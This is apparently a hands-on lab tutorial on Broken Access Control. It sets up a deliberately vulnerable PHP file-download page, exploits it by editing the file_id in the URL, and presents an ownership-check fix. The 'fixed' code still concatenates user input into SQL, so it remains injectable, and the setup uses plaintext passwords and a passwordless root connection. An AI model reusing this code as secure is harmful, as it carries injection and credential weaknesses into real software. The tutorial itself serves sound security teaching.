Objective
Learn how to identify and exploit Broken Access Control (BAC) vulnerabilities that allow unauthorized users to access restricted resources. Understand best practices to enforce proper access control mechanisms.
Scenario
You are evaluating a file-sharing application where users can view and download their uploaded files. Due to improper access control, an attacker can manipulate URLs to access other users’ data. Your goal is to exploit this vulnerability and learn how to secure access controls.
Lab Setup
Prerequisites:
- Basic knowledge of PHP and SQL.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP and MySQL support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
Database Setup
Open phpMyAdmin and create a new database:
CREATE DATABASE bac_lab;Use the database:
USE bac_lab;Create a users table:
CREATE TABLE users (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
password VARCHAR(100) NOT NULL
);Create a files table:
CREATE TABLE files (
id INT AUTO_INCREMENT PRIMARY KEY,
user_id INT NOT NULL,
filename VARCHAR(255) NOT NULL
);Insert sample data:
INSERT INTO users (username, password) VALUES ('alice', 'alice123'), ('bob', 'bob123');
INSERT INTO files (user_id, filename) VALUES (1, 'alice_report.pdf'), (2, 'bob_secret.pdf');PHP Script for File Download
Create a file download.php:
<?php
session_start();
$conn = mysqli_connect("localhost", "root", "", "bac_lab");
// Simulate user login
$_SESSION['user_id'] = 1; // Alice is logged in
if (isset($_GET['file_id'])) {
$file_id = $_GET['file_id'];
$query = "SELECT * FROM files WHERE id = '$file_id'";
$result = mysqli_query($conn, $query);
$file = mysqli_fetch_assoc($result);
if ($file) {
echo "<h2>Downloading: " . $file['filename'] . "</h2>";
} else {
echo "<h2>File not found.</h2>";
}
}
?>Running the Application
- Start the Apache server.
- Place
download.phpin the web server’s root directory (htdocsfor XAMPP). - Open
http://localhost/download.php?file_id=1to download Alice’s file.
Exploitation Steps
Step 1: Accessing Other Users’ Files
- Open
http://localhost/download.php?file_id=1to access Alice’s file. - Change the URL to
http://localhost/download.php?file_id=2.
Expected Result:
- The attacker (Alice) can download Bob’s file without authorization.
Step 2: Modifying Headers or Using a Proxy
- Use browser developer tools or a proxy tool (e.g., Burp Suite) to modify HTTP headers.
- Attempt to access restricted files by manipulating the
file_idparameter.
Expected Result:
- The attacker can bypass access controls and access unauthorized files.
Solution and Prevention
Problem Analysis
- The application fails to verify user ownership of resources.
Fixing the Vulnerability
Verify User Ownership
Modify download.php to restrict file access:
<?php
session_start();
$conn = mysqli_connect("localhost", "root", "", "bac_lab");
$user_id = $_SESSION['user_id'];
if (isset($_GET['file_id'])) {
$file_id = $_GET['file_id'];
$query = "SELECT * FROM files WHERE id = '$file_id' AND user_id = '$user_id'";
$result = mysqli_query($conn, $query);
$file = mysqli_fetch_assoc($result);
if ($file) {
echo "<h2>Downloading: " . $file['filename'] . "</h2>";
} else {
echo "<h2>Access Denied!</h2>";
}
}
?>Implement Role-Based Access Control (RBAC)
Define user roles and permissions to manage access rights.
Use Object-Level Access Control
Validate that users can only access objects they own.
Avoid Predictable Resource Identifiers
Replace incremental IDs with UUIDs or hashed references.
Testing After Fix
- Log in as Alice and access
http://localhost/download.php?file_id=1. - Attempt to access Bob’s file at
http://localhost/download.php?file_id=2. - Expected Result:
- Access is denied, and unauthorized file downloads are blocked.
Conclusion
In this lab, you exploited a Broken Access Control (BAC) vulnerability to access unauthorized resources. You also learned how to mitigate this issue using user verification, role-based access control (RBAC), and secure resource referencing.
0 Comments